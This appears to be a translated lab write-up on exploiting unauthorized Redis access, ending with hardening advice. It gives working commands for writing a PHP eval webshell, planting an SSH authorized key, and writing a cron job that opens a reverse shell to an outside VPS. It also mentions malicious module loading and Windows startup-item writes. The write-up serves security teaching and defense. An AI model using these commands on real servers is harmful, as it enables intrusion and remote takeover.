Notes on environment construction:
Modify the redis.conf configuration file
bind 0.0.0.0 daemoize yes
Open port 6379 of iptables firewall
iptables -I INPUT 1 -p tcp -m state --state NEW -m tcp --dport 6379 -j ACCEPT
install redis-cli in linux system
wget http://download.redis.io/redis-stable.tar.gz tar -zxf redis-stable.tar.gz cd redis-stable make # compile cp ./src/redis-cli /usr/bin/ #similar to environment variable /usr/local/bin
The difference between /usr/bin/ and /usr/local/bin
usr refers to Unix System Resource
/usr/bin Some executable programs pre-installed in the system, which will change with system upgrades
/usr/local/bin Executable programs installed by users are not affected by system upgrades. When users compile and install software, they are generally placed in the /usr/loca/bin directory
Priority: /usr/local/bin > /usr/bin
Redis basic command:
info #View redis information and server information flushall deletes all data del key Delete the data whose key is key get key Get the data of the parameter key
Use WIndows platform tools to connect redis
-
telnet connection
telnet 192.168.10.3 6379
-
RedisDesktopManager client direct connection
Background:
Redis is an open source NoSQL database written in C.
Redis runs based on memory and supports persistence. It adopts key-value (key-value pair) storage form, which is an indispensable part of the current distributed architecture.
Usage principle:
File writing using redis
Vulnerability exploit conditions
1. Redis is bound to 0.0.0.0:6379, and no firewall rules have been added to prevent other untrusted sources of IP access and other related security policies. If it is directly exposed to the public network, the Redis service will be directly exposed to the public network, which may cause other problems. Users can directly access Redis services and perform related operations without authorization. The current mainstream cases: the yam2 minerd mining program, and a large number of watch-smartd mining Trojans found in multiple emergency incidents.
2. If no password authentication is set (usually empty), you can remotely log in to the redis service without a password.
How to use
CNVD-2019-21763 recurrence
Background: Due to the new module function in Reids 4.x and above, attackers can implement a new Redis command in Redis through external expansion. Attackers can use this function to introduce modules to make the attacked server load malicious .so files without authorized access, thereby achieving remote code execution.
The connection is normal here, but the execution time of the command is timed out, which should be a shooting range problem
Use redis to write webshell
Obtain the absolute path of the website through phpinfo or error page
config set: quickly modify the redis configuration.
dbfilename : Set the file name of the snapshot, the default is dump.rdb
dir: default redis file save path
Know the website path, then you can set dir to a directory a, and dbfilename to file name b, and then execute save or bgsave, then we can write an arbitrary file with path a/b.
The command is as follows
config set dir /var/www/html/ config set dbfilename shell.php set x "\r\\ \r\\ <?php eval($_POST[cmd]);?>\r\\ \r\\ " save
\r\\
\r\\
means newline, and the file written by redis will have some version information.
Successfully found the corresponding file in the corresponding folder
Write the ssh-keygen public key and log in with the private key
The .ssh directory exists on the server and has write permission.
The principle is to insert a piece of data in the database, use the local public key as the value, the key value is arbitrary, and then save the buffered data in the file, so that an authorized key can be generated under /root/.ssh on the server side.
The command is as follows:
Generated under kali
ssh-keygen -t rsa
The public and private keys are generated under the /root/.ssh/id_rsa folder
(echo -e "\\ \\ "; cat id_rsa.pub; echo -e "\\ \\ ") > key.txt cat /root/.ssh/key.txt | redis-cli -h 10.10.10.152 -x set xxx
Use the attacking machine to connect to the target machine Redis, set the backup path of Redis to /root/.ssh/ and save the file named authorized_keys, and save the data on the hard disk of the target server.
redis-cli -h 10.10.10.152 -p 6379 config set dir /root/.ssh config set dbfilename authorized_keys save
Transfer the public key under the corresponding path of the victim machine
ssh connects to the target machine successfully
Redis write scheduled task
Insert a pair of key values (value, key) into the database, modify the default path of the database and set it as the path of the target host scheduled task, and save the buffered data in the file, so that a scheduled task can be successfully written on the server side for execution Rebound shell.
# Rebound shell to port 7777 of vps set xxx "\\ \\ */1 * * * * /bin/bash -i> & amp;/dev/tcp/47.94.xx.xx/7777 0> & amp;1\\ \ n" config set dir /var/spool/cron/crontabs/ #Here is the location of ubuntu timing tasks centos is /var/spool/cron/ config set dbfilename root save
This method can only be used on Centos, and it will not work on Ubuntu for the following reasons:
Because the default redis write file is 644 permission, but ubuntu requires the execution of the scheduled task file /var/spool/cron/crontabs/ permission must be 600, which is -rw——- to be executed, otherwise an error will be reported ( root) INSECURE MODE (mode 0600 expected), and the Centos scheduled task file /var/spool/cron/permission 644 can also be executed
Common errors
-
Errors that may occur when setting config set dir /var/spool/cron/crontabs/:
The root user has never logged in. If it is a target machine practice, execute ssh localhost on the target machine to set
-
(error) ERR Changing directory: Permission denied
Indicates that redis is not started as root
The difference between /var/spool/cron/ and /etc/crontab
/var/spool/cron/ This directory stores the crontab tasks of each user including root. Each task is named after the creator. For example, the file corresponding to the crontab task created by tom is /var/spool/cron/tom . Generally, a user has at most one crontab file
/etc/crontab This file is responsible for arranging the crontab for maintaining the system and other tasks formulated by the system administrator
How to use redis on windows?
-
If you can get the absolute path of the web, write it directly to the webshell
Change the website directory under linux and write in webshell
-
Write startup items
The directory of the startup item under windows is
C:/Users/Administrator/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/startup/
(You also need to know the user name of the other party, the default is administrator)
to be continued
-
Write mof, dll hijacking, etc.
to be continued
Reference: Summary of Redis Unauthorized Exploitation Methods in Windows Environment – FreeBuf Network Security Industry Portal
Unauthorized access to Redis under Windows – Anquanke – Security Information Platform (anquanke.com)
Redis Unauthorized Access Defense Method
In the redis installation directory, correctly configure the redis.conf file
-
By default, bind 127.0.0.1 is only open to the local
-
Add login password: modify redis.conf file, add requirepass password
-
Modify the default port when it needs to be opened to the outside world (the port is not repeated) port 2333
-
Cooperate with iptables to restrict opening
-
Power reduction: run the Redis service with low privileges (restart redis to take effect)
-
It is forbidden to start the redis service with root privileges